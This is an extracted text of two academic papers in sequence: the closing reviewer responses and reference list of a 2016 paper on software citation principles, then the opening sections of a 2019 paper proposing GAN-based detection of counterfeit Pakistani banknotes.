Additional thoughts (not sure what section this applies to) The principles do not address virtual machines. As these are becoming more common and relevant when addressing the reproducibility of research, it is important this “form” of software is acknowledged. The question remains in which cases should authors cite the current version, which the static archived version, and in which the virtual machine? In this way software is very much a unique evolving research object and might not fit perfectly into the same citation practices and structure as other research objects. In addition, software citation could possibly occur within the virtual machine. This could be added as a use case. Our response: We feel this has been addressed in Section 5.8, with the explicit addition of virtual machines in addition to executables and containers. This is also an issue that should be addressed further by the follow-on implementation working group. On persistence of identifier vs. persistence of software The persistence principle outlined in (4) is a key element in making software citeable. Where software has become part of the record of science not only the identifier and metadata of the software should be persistent, it should also be the goal to keep a persistent copy of the source code, where applicable. This links with the accessibility principle (5). There are still many open questions about how to resolve package dependencies in the long term, therefore I would not make the persistent access to code a hard Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 26/31 http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ requirement but may add something more specific towards preserving the record of science. Our response: Our goal is for software citations to point to (persistent) archived source code, but we are not—nor could we—require this. Granularity of the citation One of the key issues with any citation, whether document, individual, or software is the specificity of what is being cited. In the case of publications, there is almost zero specificity most of the time. It’s very easy to cite an entire package even though one function was used. Part of this problem is being solved in the Python world through this project (https://github.com/duecredit/duecredit). Any citation should have the ability to specify more than just the obvious, but even the obvious would be a good starting point. The citation/url should therefore allow for greater specificity within a code base. In general though, a provenance record of the workflow would be significantly more useful than a citation from a research perspective. Our response: We agree that greater specificity is desirable in some cases, but we do not believe this rises to the level of what should be specified or discussed in the principles at this time. “Software citations should permit : : : access to the software itself” Under the “Access” header, the data declaration states that: Data citations should facilitate access to the data themselves. Under the same header, the software declaration states: Software citations should permit and facilitate access to the software itself. The addition of “permit” suggests that software citations should also grant the user with permission to access the software. Is this intentional? It doesn’t seem like a good idea to make access a requirement for discovery, so “permit” might not be helpful in this sentence. Our response: To avoid confusion, we removed “permit and” from the accessibility principle. Access to software: free vs commercial The section talks about software that is “free” as well as “commercial” software. I am not sure whether this is about free as in freedom (or just gratis or freely available), since it is compared with commercial software, which is unrelated in general, see http://www.gnu. org/philosophy/words-to-avoid.html#Commercial. I suppose that “free” should be replaced by “gratis” and “commercial” be replaced by “non-free” in that section. Our response: We think this is sufficiently clear as written. Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 27/31 https://github.com/duecredit/duecredit http://www.gnu.org/philosophy/words-to-avoid.html#Commercial http://www.gnu.org/philosophy/words-to-avoid.html#Commercial http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ ACKNOWLEDGEMENTS While D. S. Katz prepared this material while employed at the NSF, any opinion, finding, and conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of the NSF. ADDITIONAL INFORMATION AND DECLARATIONS Funding Work by D. S. Katz was supported by the National Science Foundation (NSF) while working at the Foundation. Work by K. E. Niemeyer was supported in part by the NSF under grant ACI-1535065. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: NSF: ACI-1535065. Competing Interests Arfon M. Smith is an employee of GitHub, Inc., San Francisco, California. Author Contributions � Arfon M. Smith wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � Daniel S. Katz wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � Kyle E. Niemeyer wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. Data Deposition The following information was supplied regarding data availability: The research in this article did not generate, collect or analyse any raw data or code. REFERENCES AAS Editorial Board. 2016. Policy statement on software. Available at http://journals.aas.org/ policy/software.html (accessed 17 February 2016). Ahalt S, Carsey T, Couch A, Hooper R, Ibanez L, Idaszak R, Jones MB, Lin J, Robinson E. 2015. NSF workshop on supporting scientific discovery through norms and practices for software and data citation and attribution. Technical Report. Arlington: National Science Foundation. Available at http://dl.acm.org/citation.cfm?id=2795624. Allen A, Berriman GB, DuPrie K, Mink J, Nemiroff R, Robitaille T, Shamir L, Shortridge K, Taylor M, Teuben P, Wallin J. 2015. Improving software citation and credit. Technical Report. Available at http://arxiv.org/abs/1512.07919 [cs.DL]. Barnes N, Jones D, Norvig P, Neylon C, Pollock R, Jackson J, Stodden V, Suber P. 2016. Science code manifesto. Available at http://sciencecodemanifesto.org (accessed 18 April 2016). Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 28/31 http://journals.aas.org/policy/software.html http://journals.aas.org/policy/software.html http://dl.acm.org/citation.cfm?id=2795624 http://arxiv.org/abs/1512.07919 http://sciencecodemanifesto.org http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ Bechhofer S, Buchan I, Roure DD, Missier P, Ainsworth J, Bhagat J, Couch P, Cruickshank D, Delderfield M, Dunlop I, Gamble M, Michaelides D, Owen S, Newman D, Sufi S, Goble C. 2013. Why linked data is not enough for scientists. Future Generation Computer Systems 29(2):599–611 DOI 10.1016/j.future.2011.08.004. Chue Hong N. 2011. Publish or be damned? An alternative impact manifesto for research software. Available at http://www.software.ac.uk/blog/2011-05-02-publish-or-be-damned-alternative- impact-manifesto-research-software (accessed 17 February 2016). CRediT. 2016. Consortia Advancing Standards in Research Administration Information. Available at http://casrai.org/CRediT (accessed 17 February 2016). Data Citation Synthesis Group. 2014. Joint declaration of data citation principles. Martone M. (ed.). Final Document. San Diego: FORCE11. Available at https://www.force11.org/group/joint- declaration-data-citation-principles-final. Fox P, Signell R. 2011. NSF geo-data informatics: exploring the life cycle, citation and integration of geo-data workshop report. Final Document. Troy: Rensselaer Polytechnic Institute. Available at http://tw.rpi.edu/web/workshop/community/GeoData2011. Gent I, Jones C, Matthews B. 2015. Guidelines for persistently identifying software using DataCite. A JISC Research Data Spring Project. Available at http://rrr.cs.st-andrews. ac.uk/wp-content/uploads/2015/10/guidelines-software-identification.pdf (accessed 25 April 2016). Gil Y, Ratnakar V, Garijo D. 2015. OntoSoft: capturing scientific software metadata. In: Proceedings of the Eighth ACM International Conference on Knowledge Capture (K-CAP). New York: ACM. GitHub. 2014. Making your code citable with GitHub & Zenodo. Available at https://guides.github. com/activities/citable-code/ (accessed 10 March 2016). Gutzman K, Konkiel S, White M, Brush M, Ilik V, Conlon M, Haendel M, Holmes K. 2016. Attribution of work in the scholarly ecosystem. figshare DOI 10.6084/m9.figshare.3175198.v1. Hannay JE, Langtangen HP, MacLeod C, Pfahl D, Singer J, Wilson G. 2009. How do scientists develop and use scientific software? In: Proceedings 2009 ICSE Workshop on Software Engineering for Computational Science and Engineering, SECSE. Piscataway: IEEE, 1–8 DOI 10.1109/SECSE.2009.5069155. Howison J, Bullard J. 2015. Software in the scientific literature: problems with seeing, finding, and using software mentioned in the biology literature. Journal of the Association for Information Science and Technology 67(9):2137–2155 DOI 10.1002/asi.23538. Huang Y-H, Rose PW, Hsu C-N. 2015. Citing a data repository: a case study of the protein data bank. PLoS ONE 10(8):e136631 DOI 10.1371/journal.pone.0136631. Ison J, Kalaš M, Jonassen I, Bolser D, Uludag M, McWilliam H, Malone J, Lopez R, Pettifer S, Rice P. 2013. EDAM: an ontology of bioinformatics operations, types of data and identifiers, topics and formats. Bioinformatics 29(10):1325–1332 DOI 10.1093/bioinformatics/btt113. Jackson M. 2012. How to cite and describe software. Available at http://www.software.ac.uk/how- cite-and-describe-software (accessed 17 February 2016). Jackson M. 2014. Oh research software, how shalt I cite thee? Available at http://www.software.ac. uk/blog/2014-07-30-oh-research-software-how-shalt-i-cite-thee (accessed 17 February 2016). Jackson I, Schwarz C. 2016. Debian policy manual. Version 3.9.8.0. Available at https://www. debian.org/doc/debian-policy/ch-controlfields.html (accessed 17 April 2016). Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 29/31 http://dx.doi.org/10.1016/j.future.2011.08.004 http://www.software.ac.uk/blog/2011-05-02-publish-or-be-damned-alternative-impact-manifesto-research-software http://www.software.ac.uk/blog/2011-05-02-publish-or-be-damned-alternative-impact-manifesto-research-software http://casrai.org/CRediT https://www.force11.org/group/joint-declaration-data-citation-principles-final https://www.force11.org/group/joint-declaration-data-citation-principles-final http://tw.rpi.edu/web/workshop/community/GeoData2011 http://rrr.cs.st-andrews.ac.uk/wp-content/uploads/2015/10/guidelines-software-identification.pdf http://rrr.cs.st-andrews.ac.uk/wp-content/uploads/2015/10/guidelines-software-identification.pdf https://guides.github.com/activities/citable-code/ https://guides.github.com/activities/citable-code/ http://dx.doi.org/10.6084/m9.figshare.3175198.v1 http://dx.doi.org/10.1109/SECSE.2009.5069155 http://dx.doi.org/10.1002/asi.23538 http://dx.doi.org/10.1371/journal.pone.0136631 http://dx.doi.org/10.1093/bioinformatics/btt113 http://www.software.ac.uk/how-cite-and-describe-software http://www.software.ac.uk/how-cite-and-describe-software http://www.software.ac.uk/blog/2014-07-30-oh-research-software-how-shalt-i-cite-thee http://www.software.ac.uk/blog/2014-07-30-oh-research-software-how-shalt-i-cite-thee https://www.debian.org/doc/debian-policy/ch-controlfields.html https://www.debian.org/doc/debian-policy/ch-controlfields.html http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ Jones MB, Smith AM, Cabunoc Mayes A, Boettiger C. 2014. Minimal metadata schemas for science software and code, in JSON and XML. Available at https://github.com/codemeta/ codemeta (accessed 25 March 2016). Katz DS. 2014. Transitive credit as a means to address social and technological concerns stemming from citation and attribution of digital products. Journal of Open Research Software 2(1):e20 DOI 10.5334/jors.be. Katz DS, Choi S-CT, Lapp H, Maheshwari K, Löffler F, Turk M, Hanwell M, Wilkins-Diehr N, Hetherington J, Howison J, Swenson S, Allen G, Elster A, Berriman B, Venters C. 2014. Summary of the first workshop on sustainable software for science: practice and experiences (WSSSPE1). Journal of Open Research Software 2(1):e6 DOI 10.5334/jors.an. Katz DS, Choi S-CT, Wilkins-Diehr N, Chue Hong N, Venters CC, Howison J, Seinstra FJ, Jones M, Cranston K, Clune TL, de Val-Borro M, Littauer R. 2016a. Report on the second workshop on sustainable software for science: practice and experiences (WSSSPE2). Journal of Open Research Software 4(1):e7 DOI 10.5334/jors.85. Katz DS, Choi S‐CT, Niemeyer KE, Hetherington J, Löffler F, Gunter D, Idaszak R, Brandt SR, Miller MA, Gesing S, Jones ND, Weber N, Marru S, Allen G, Penzenstadler B, Venters CC, Davis E, Hwang L, Todorov I, Patra A, de Val-Borro M. 2016b. Report on the third workshop on sustainable software for science: practice and experiences (WSSSPE3). Technical Report. Available at http://arxiv.org/abs/arXiv:1602.02296 [cs.SE]. Katz DS, Smith AM. 2015. Implementing transitive credit with JSON-LD. Journal of Open Research Software 3:e7 DOI 10.5334/jors.by. Knepley MG, Brown J, McInnes LC, Smith BF. 2013. Accurately citing software and algorithms used in publications. figshare DOI 10.6084/m9.figshare.785731.v1. Lipson C. 2011. Cite Right, Second Edition: A Quick Guide to Citation Styles–MLA, APA, Chicago, the Sciences, Professions, and More, Chicago Guides to Writing, Editing, and Publishing. Chicago: University of Chicago Press. Malone J, Brown A, Lister AL, Ison J, Hull D, Parkinson H, Stevens R. 2014. The Software Ontology (SWO): a resource for reproducibility in biomedical data analysis, curation and digital preservation. Journal of Biomedical Semantics 5(1):1–13 DOI 10.1186/2041-1480-5-25. Mayernik M, Maull K, Hart D. 2015. Tracing the use of research resources using persistent citable identifiers. Poster presented at NSF SI2 PI Meeting, Arlington, VA. Available at https://share.renci. org/SI2PI2015/2015_SI2PI_Posters/mayernik_SI2poster_Feb2015.pdf (accessed 3 March 2016). McAdoo T. 2015. How to Cite Software in APA Style. Available at http://blog.apastyle.org/apastyle/ 2015/01/how-to-cite-software-in-apa-style.html. Morin A, Urban J, Adams PD, Foster I, Sali A, Baker D, Sliz P. 2012. Shining light into black boxes. Science 336(6078):159–160 DOI 10.1126/science.1218263. Norén L. 2015. Invitation to comment on a proposal for a cohesive research software citation- enabling platform. Available at http://astronomy-software-index.github.io/2015-workshop/ (accessed 17 February 2016). Parsons MA, Duerr R, Minster J-B. 2010. Data citation and peer review. Eos, Transactions American Geophysical Union 91(34):297–298 DOI 10.1029/2010EO340001. Rowe BR, Wood DW, Link AN, Simoni DA. 2010. Economic impact assessment of NIST’s Text REtrieval Conference (TREC) program. Final Report. Research Triangle Park: RTI International. Available at http://trec.nist.gov/pubs/2010.economic.impact.pdf (accessed 17 April 2016). Software Attribution for Geoscience Applications (SAGA). 2015. Software for science: getting credit for code. Available at https://geodynamics.org/cig/projects/saga/ (accessed 6 April 2016). Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 30/31 https://github.com/codemeta/codemeta https://github.com/codemeta/codemeta http://dx.doi.org/10.5334/jors.be http://dx.doi.org/10.5334/jors.an http://dx.doi.org/10.5334/jors.85 http://arxiv.org/abs/arXiv:1602.02296 http://dx.doi.org/10.5334/jors.by http://dx.doi.org/10.6084/m9.figshare.785731.v1 http://dx.doi.org/10.1186/2041-1480-5-25 https://share.renci.org/SI2PI2015/2015_SI2PI_Posters/mayernik_SI2poster_Feb2015.pdf https://share.renci.org/SI2PI2015/2015_SI2PI_Posters/mayernik_SI2poster_Feb2015.pdf http://blog.apastyle.org/apastyle/2015/01/how-to-cite-software-in-apa-style.html http://blog.apastyle.org/apastyle/2015/01/how-to-cite-software-in-apa-style.html http://dx.doi.org/10.1126/science.1218263 http://astronomy-software-index.github.io/2015-workshop/ http://dx.doi.org/10.1029/2010EO340001 http://trec.nist.gov/pubs/2010.economic.impact.pdf https://geodynamics.org/cig/projects/saga/ http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ Sandve GK, Nekrutenko A, Taylor J, Hovig E. 2013. Ten simple rules for reproducible computational research. PLoS Computational Biology 9(10):e1003285 DOI 10.1371/journal.pcbi.1003285. Soergel DAW. 2015. Rampant software errors may undermine scientific results [version 2; referees: 2 approved]. F1000Research 3:303 DOI 10.12688/f1000research.5930.2. Software Credit Workshop. 2015. Software Credit Workshop. Available at http://www.software.ac. uk/software-credit (accessed 6 April 2016). Starr J, Castro E, Crosas M, Dumontier M, Downs RR, Duerr R, Haak L, Haendel M, Herman I, Hodson S, Hourclé J, Kratz JE, Lin J, Nielsen LH, Nurnberger A, Proell S, Rauber A, Sacchi S, Smith A, Taylor M, Clark T. 2015. Achieving human and machine accessibility of cited data in scholarly publications. PeerJ Computer Science 1:e1 DOI 10.7717/peerj-cs.1. Sufi S, Chue Hong NP, Hettrick S, Antonioletti M, Crouch S, Hay A, Inupakutika D, Jackson M, Pawlik A, Peru G, Robinson J, Carr L, De Roure D, Goble C, Parsons M. 2014. Software in reproducible research: advice and best practice collected from experiences at the collaborations workshop. In: Proceedings 1st ACM SIGPLAN Workshop on Reproducible Research Methodologies and New Publication Models in Computer Engineering (TRUST ’14). Edinburgh: ACM, 2:1–2:4 DOI 10.1145/2618137.2618140. Van de Sompel H, Payette S, Erickson J, Lagoze C, Warner S. 2004. Rethinking scholarly communication: building the system that scholars deserve. D-Lib Magazine 10:9. Available at http//www.dlib.org/dlib/september04/vandesompel/09vandesompel.html. Ward G, Baxter A. 2016. Distributing Python Modules. Available at https://docs.python.org/3.6/ distutils/setupscript.html#additional-meta-data (accessed 31 August 2016). White O, Dhar A, Bonazzi V, Couch J, Wellington C. 2014. NIH Software Discovery Index Meeting Report. NIH. Available at http://www.softwarediscoveryindex.org/ & https://gist.github. com/mhucka/44921ea1e9a01697dbd0591d872b7b22. Wickham H. 2015. R Packages. First Edition. Sebastopol: O’Reilly Media. Wilson G, Aruliah DA, Brown CT, Chue Hong NP, Davis M, Guy RT, Haddock SHD, Huff KD, Mitchell IM, Plumbley MD, Waugh B, White EP, Wilson P. 2014. Best practices for scientific computing. PLoS Biology 12(1):e1001745 DOI 10.1371/journal.pbio.1001745. Wilson R. 2013. Encouraging citation of software–introducing CITATION files. Available at http://www.software.ac.uk/blog/2013-09-02-encouraging-citation-software-introducing-citation- files (accessed 17 February 2016). Smith et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.86 31/31 http://dx.doi.org/10.1371/journal.pcbi.1003285 http://dx.doi.org/10.12688/f1000research.5930.2 http://www.software.ac.uk/software-credit http://www.software.ac.uk/software-credit http://dx.doi.org/10.7717/peerj-cs.1 http://dx.doi.org/10.1145/2618137.2618140 http://www.dlib.org/dlib/september04/vandesompel/09vandesompel.html https://docs.python.org/3.6/distutils/setupscript.html#additional-meta-data https://docs.python.org/3.6/distutils/setupscript.html#additional-meta-data http://www.softwarediscoveryindex.org/ https://gist.github.com/mhucka/44921ea1e9a01697dbd0591d872b7b22 https://gist.github.com/mhucka/44921ea1e9a01697dbd0591d872b7b22 http://dx.doi.org/10.1371/journal.pbio.1001745 http://www.software.ac.uk/blog/2013-09-02-encouraging-citation-software-introducing-citation-files http://www.software.ac.uk/blog/2013-09-02-encouraging-citation-software-introducing-citation-files http://dx.doi.org/10.7717/peerj-cs.86 https://peerj.com/computer-science/ Software citation principles Software Citation Principles Motivation Process of Creating Principles Use cases Related Work Discussion Future Work Appendix A Appendix B Appendix C Acknowledgements References work_zmzfnu5br5grbipquovhai5d7a ---- Submitted 4 November 2018 Accepted 16 July 2019 Published 2 September 2019 Corresponding author Toqeer Ali, toqeer@iu.edu.sa Academic editor Diego Amancio Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.216 Copyright 2019 Ali et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS DeepMoney: counterfeit money detection using generative adversarial networks Toqeer Ali1, Salman Jan2, Ahmad Alkhodre3, Mohammad Nauman4, Muhammad Amin4 and Muhammad Shoaib Siddiqui3 1 Faculty of Computer and Information Systems, Islamic University of Madinah, Madinah, Saudi Arabia 2 Malaysian Institute of Information Technology, University Kuala Lumpur, Kuala Lumpur, Malaysia 3 Faculty of Computer and Information Systems, Islamic University of Madinah, Madinah, Saudi Arabia 4 Computer Science, FAST-NUCES, Peshawar, Pakistan ABSTRACT Conventional paper currency and modern electronic currency are two important modes of transactions. In several parts of the world, conventional methodology has clear precedence over its electronic counterpart. However, the identification of forged currency paper notes is now becoming an increasingly crucial problem because of the new and improved tactics employed by counterfeiters. In this paper, a machine assisted system—dubbed DeepMoney—is proposed which has been developed to discriminate fake notes from genuine ones. For this purpose, state-of-the-art models of machine learning called Generative Adversarial Networks (GANs) are employed. GANs use unsupervised learning to train a model that can then be used to perform supervised predictions. This flexibility provides the best of both worlds by allowing unlabelled data to be trained on whilst still making concrete predictions. This technique was applied to Pakistani banknotes. State-of-the-art image processing and feature recognition techniques were used to design the overall approach of a valid input. Augmented samples of images were used in the experiments which show that a high-precision machine can be developed to recognize genuine paper money. An accuracy of 80% has been achieved. The code is available as an open source to allow others to reproduce and build upon the efforts already made. Subjects Data Mining and Machine Learning, Data Science Keywords Deep Learning, Counterfeit Money, Generative Adversarial Networks INTRODUCTION Currency is a common system to perform transactions for trading or exchange of goods among people. Various currencies are recognized for trading between nations in foreign exchange markets. The problem with paper currency is that it may be counterfeit. Counterfeit is imitation money which is produced without the legal sanction of the state or government, considered as fraud (Derrida, 1994). Anti-counterfeiting measures can be adopted which involve the fine details of the raised intaglio printing on notes which allows non-experts to easily spot forgeries (Tanaka, Nishiyama & Koyama, 1996). With advancement in technology, fakes and forgery rates are increasing. In 2015, almost 70% of the $78 million in counterfeit currency circulating in the U.S was made using How to cite this article Ali T, Jan S, Alkhodre A, Nauman M, Amin M, Siddiqui MS. 2019. DeepMoney: counterfeit money detection us- ing generative adversarial networks. PeerJ Comput. Sci. 5:e216 http://doi.org/10.7717/peerj-cs.216 mailto:toqeer@iu.edu.sa https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.216 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.216 digital printing technologies (Murakami-Fester, 2016; Bartkiewicz et al., 2017). As reported by Bloomberg news, a 34-year-old hairstylist forged up to $20,000 in counterfeit notes (Magdaleno, 2016). Another research carried out by Gallup in Pakistan found out that more than a quarter of the population (26%) have received counterfeit money while buying items from the market. Elsewhere, a raid by Peshawar police yielded fake documents and 0.7 million in counterfeit currency notes. The chairman and managing director of a security printing corporation in Pakistan said that enemy countries were producing counterfeit notes of Pakistani rupee which was being used exclusively for terrorist activities in the country (Shoaib et al., 2013; Taillard, 2018). The State Bank of Pakistan has carried out various types of campaigns to raise awareness of the security features of bank notes, both directly to its customers and in collaboration with other banks. Bank’s efforts to raise awareness amongst the general public involve a media campaign and a mobile application that detects counterfeit notes. The awareness of the security features of bank notes in public may help some people identify counterfeit notes; however, most of the public, especially people who are illiterate, are not able to differentiate between a forged currency note and a genuine one. Also, these features are hard to recognized by human eye or touch when the currency notes are old, dirty, and damaged. To solve the issues in classifying a currency note as a fake or a genuine note, we have proposed a machine assisted system named DeepMoney. For discriminating fake notes from genuine ones, state-of-the-art models of machine learning called Generative Adversarial Networks (GANs) are employed. GANs use an unsupervised learning to train a model that can then be used to perform supervised predictions. This flexibility provides the best of both worlds by allowing unlabelled data to be trained on whilst still making concrete predictions. This technique is applied to Pakistani banknotes. State-of-the-art image processing and feature recognition techniques were used to design the overall approach of a valid input. The rest of paper is organized as follows. ‘Related work’ discusses the related work and provides details of various deep learning models in the subject domain. ‘Proposed solution’ provides details of the proposed solution and how the dataset was developed. ‘Results’ presents the results and evaluation details of employing models on the dataset. The paper is concluded in ‘Conclusion’. RELATED WORK Bearing the aforementioned issues in mind, a number of research solutions have been provided in the past to check the validity of the banknotes (Thakur & Kaur, 2014; Mirza & Nanda, 2012a; Chakraborty et al., 2013; Prasanthi & Setty, 2015; Kang & Lee, 2016). Mirza & Nanda (2012b) offered a solution for a currency verification system using image processing based on the extraction of characteristics. The solution was applied to Indian banknotes. The edge detection and image segmentation were used to make a comparison between the original and the counterfeit notes. Snehlata et al. presented a UML activity model designed to represent the dynamic aspects for identification of fake currency for Rs 2000 currency note for Indian rupee. They have used class descriptions for real and fake images of the currency for security threads in the Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 2/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.216 form of strips and apply comparison of block pixels to identify fake and real currency (Snehlata & Saxena, 2017). Singh et al. have presented an image processing-based approach for detecting forged Indian currency. The authors have utilized security thread and latent image, embedded on the note to identify forgery. First the security features are extracted and encoded, then a clustering algorithm, k-means is applied for classification. Then the latent image, segmented via template matching is encoded using HOG descriptor and classified with an SVM model to predict if the note is fake or real Singh, Ozarde & Abhiram (2018). Abburu et al. (2017) proposed a system for automated currency recognition using image processing techniques for accurately identifying both the country of origin and the denomination of a given banknote. However, they do not discriminate between a fake and a real currency note. However, the DeepMoney solution proposed here does not use image processing and differs in many ways. Ross et al. (2016) have proposed a database for detecting counterfeit items using digital fingerprint records which can be used for detecting counterfeit currency note. It takes an image of the authentication region and creates a digital fingerprint of the object. It uses signal processing techniques, such as, FFT of the image to create the digital fingerprint to extract features which are used to compare the fake and real objects. Kayani presents a bank note processing system based on florescence and phosphorescence detection (Kayani, 2017). The illumination source is used to direct light on a note and the sensors measures the florescence and phosphorescence that are used to identify if the note is fake or real. Micali & Devadas (2017) proposed a solution for counterfeit prevention using physically unclonable value for unique identification for each currency note. Phillips has presented a miniature counterfeit detector in his patent (Phillips, 2018). It applies multiple test to assure the authenticity of a currency note. Back light illuminators are used for visual inspection of the watermarks, florescent and anti-counterfeiting features. Sensors, such as, magnetic ink sensor, are used to detect the magnetic ink based security features on the note. However, some of the features are detected but with old notes the rate of false negative would be high. Alicherry has given a digital signature based solution for verifying the authenticity of a currency note and tracking duplicate notes. A digital signature based on the serial number of the currency note is attached to the currency note and people can query the authenticity of the note by sending a photograph of the note to a centralized server for verification and tracking Alicherry (2017). Before GANs (Goodfellow et al., 2014), a neural network approach was used to authenticate banknotes (Mohamad et al., 2014). In this research, Generative Models to train a neural network are preferred. Python has also been used to develop and implement a framework for the identification of Pakistani currency. Berenguel et al. (2016) also worked on methods by which to identify genuine and photocopied bank notes. The technique applied was to differentiate the texture between the original and photocopied notes. Other studies Choi et al. (2010) also worked on the detection of counterfeit banknotes by using optical coherence tomography (OCT). Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 3/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.216 To differentiate between genuine and counterfeit notes, the researchers used a three- dimensional imaging security feature according to the FF-OCT system. Their results show that it is possible to recognize original notes with the DeepMoney technique. However, their technique was based on a particular feature of specific banknotes which may prove to be less effective on other notes. This also differs from the DeepMoney perspective of recognizing banknotes. Table 1 elaborates some recent research work regarding counterfeit money. There have been a few solutions provided which use machine learning techniques. For example, Hassanpour & Farahabadi (2009) used Hidden Markov Models for the recognition of banknotes. In the following subsection, we discuss some of the deep learning model that could be utilized in the field of identifying currency forgery and counterfeit currency. Deep learning models Some of the best known deep learning models in comparison to our proposed GANs model on the grounds for selecting the one which will offer the most robust results, are discussed in the following subsections. Recurrent neural networks A number of techniques exist in traditional machine learning and deep learning which allow patterns in sequences and contents to be learned. A recurrent neural network is one such technique. Context sensitive and inherently ordered data is used in this network. The network can operate with both audio and text input. Recurrent neural networks are adept at handling arbitrary length sequence data. This network is a powerful tool which requires the sequence to be contextual. Recurrent neural networks are still very dominant although, in the past, they were very hard to train. However, there is now a solution, Hessian-free optimization, which offers the ability to train recurrent neural networks. The model is depicted in Fig. 1. Fully connected neural networks As its name indicates, a fully connected neural network is one in which all the neurons are connected to the next layer of neurons. There are many layers such as the max pooling and the convolutional layers. The high level perception in these networks uses only one type of layer and these layers are fully connected. These connected layers in the neurons link to all the activations in the previous layers. The activation function may also be calculated by the multiplication of a matrix trailed by a network’s 0 set, also known as bias. A fully connected neural network has an input layer, a hidden layer and an output layer as depicted in Fig. 2. Convolutional neural network This type of neural network processes the dimensioned and order data in different ways. Convolutional neural networks (Krizhevsky, Sutskever & Hinton, 2012) are learned through the same method as the stochastic gradient descent method traditionally learns. The following are the convolutional neural network layers: Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 4/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.216 Table 1 Related work done in the recent years in the field of counterfeit currency detection. Authors Objective Method Limitations Year Thakur & Kaur (2014) Review of fake currency detection techniques Survey paper Not applicable 2014 Chakraborty et al. (2013) Recent developments in paper currency recognition system Survey paper Not applicable 2013 Prasanthi & Setty (2015) Indian paper currency authentication system Image processing Performance is less than machine learning based systems 2015 Kang & Lee (2016) Fake banknote detection Multispectral imaging sensors Feature extraction and classifica- tion require high computation 2016 Mirza & Nanda (2012a) Currency verification Image processing: edge detection and image segmentation Only for Indian notes 2012 Snehlata & Saxena (2017) Fake currency identification UML activity model using class descriptors Only for Rs 2000 note of Indian currency 2017 Singh, Ozarde & Abhiram (2018) Detecting forged Indian currency Image processing, k-means clustering and SVM as a classifier Limited to Rs 500 note of Indian currency 2018 Abburu et al. (2017) Automated currency recognition for identifying country of origin and denomination Image processing Cannot detect counterfeit or forgery 2017 Ross et al. (2016) Database for detecting counterfeit items Digital fingerprint records using images of security features Performance is less than ma- chine learning based systems 2016 Kayani (2017) Bank note processing system Florescence and phosphores- cence detection Many security features are not detectable using florescence and phosphorescence detection 2017 Micali & Devadas (2017) Counterfeit prevention Physically unclonable value for unique identification for each currency note Needs Internet connection for sending images to centralized server 2017 Phillips (2018) Miniature counterfeit detector Back light illuminators are used for visual inspection of the 93 watermarks, florescent and anti- counterfeiting features Many security features are not detectable using florescence and phosphorescence detection 2018 Alicherry (2017) Verifying the authenticity of a currency note and tracking duplicate notes Digital signature based on the serial number of the currency note Needs Internet connection for sending images to centralized server 2017 Berenguel et al. (2016) Identify genuine bank notes Differentiate the texture between the original and photocopied notes using OFT Accuracy is less than machine learning based systems 2016 Choi et al. (2010) Counterfeit detection Characterization of safety fea- ture on banknote with full-field optical coherence tomography Accuracy is less than machine learning based systems 2010 Hassanpour & Farahabadi (2009) Paper currency recognition Machine Learning: Hidden Markov Models Accuracy is less than the proposed system 2009 Mohamad et al. (2014) Banknote authentication Srtificial neural network Accuracy is less than the proposed system 2014 Convolutional In this layer there is a grid of neurons. Commonly, this grid is rectangular which requires that the previous layer should also take the form of the same rectangular shaped grid. In the convolutional layer, the neurons have the same weight. Each neuron takes the input from the rectangular section with the input coming from the previous layer. Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 5/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.216 Figure 1 A recurrent neural network. Full-size DOI: 10.7717/peerjcs.216/fig-1 Figure 2 A fully connected neural network. Full-size DOI: 10.7717/peerjcs.216/fig-2 Max-pooling Pooling layers are present after each convolutional layer. The layer usually grabs tiny rectangular blocks from the convolutional layer and then samples them so that only one output is created. Pooling can be achieved in many ways such as by taking an average or by learning patterns and combinations, for example learning linear associations or the combination of neurons in that small block. Autoencoder There are many machine learning models but auto-encoder are fairly basic models. They come from a family of neural networks for which the input is same as the output. Auto-encoders compress the latent space representation and then reconstruct the output from the representation. Auto-encoders are used for unsupervised learnings and so are an artificial network. The learning of encoders are efficient enough. Today, auto-encoders are an emerging field of research in numerous areas, such as anomaly detection. Ali et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.216 6/21 https://peerj.com https://doi.org/10.7717/peerjcs.216/fig-1 https://doi.org/10.7717/peerjcs.216/fig-2 http://dx.doi.org/10.7717/peerj-cs.216 Figure 3 Deep belief networks. Full-size DOI: 10.7717/peerjcs.216/fig-3 Deep belief networks Deep belief networks (Lee et al., 2009) consist of layers of variables, both latent as well as stochastic. Latent variables are usually composed of values that are binary and known as feature detectors. There are many layers in this network. The top layers consist of connections that are undirected which allows them to form a kind of associative memory. On the other hand, the lower layers are directed 